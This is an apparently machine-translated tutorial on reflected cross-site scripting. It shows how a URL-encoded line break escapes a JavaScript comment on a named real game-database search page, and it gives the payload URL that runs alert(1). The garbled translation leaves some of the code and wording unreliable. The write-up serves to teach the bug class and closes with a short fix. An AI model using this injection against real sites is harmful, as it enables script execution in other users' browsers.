In some cases, we only need a line break to bypass filtering. It lets double quotation marks and angle brackets know that "they are not a symbol in battle ".
1. The actual scenario is as follows.
Http://datalib.games.qq.com/cgi-bin/search? Libid = 178 & FilterAttrAND = 3602 & FilterValueAND = aaaaaaaaaa
Corresponding, we can see what output points will the input aaaaaaaaa appear on the page?
2. Good. There are five entries in total, between HTML tags (Tutorial 1) and between <script>... </script>. However, the filtered, <,> filtered, and ", also filtered out ..
3. That is to say, the traditional one is no longer enough. Let's continue to look at the other five places. Ah, there is still a large comment, and our [Output] is also displayed]
4. Well, will this happen?
// I am a comment. I love taking a bath, OH ~ Oh ~ Oh ~ [I am the output]
If you can use line breaks.
// I am a comment. I love taking a bath, OH ~ Oh ~ Oh ~ [I am an output line break
Alert (1); // I am the output]
In this way, alert (1); will be successfully executed.
5. Well, with such an idea, it is not difficult to construct the following exploitation.
Http://datalib.games.qq.com/cgi-bin/search? Libid = 178 & FilterAttrAND = 3602 & FilterValueAND = % 0 aalert (1 );//
Check the output. Hey, no filtering.
6. In this way, this time our linefeed is successful. It is not a symbol in the battle!
Solution:
Try not to output content in JS comments. It's quite dangerous.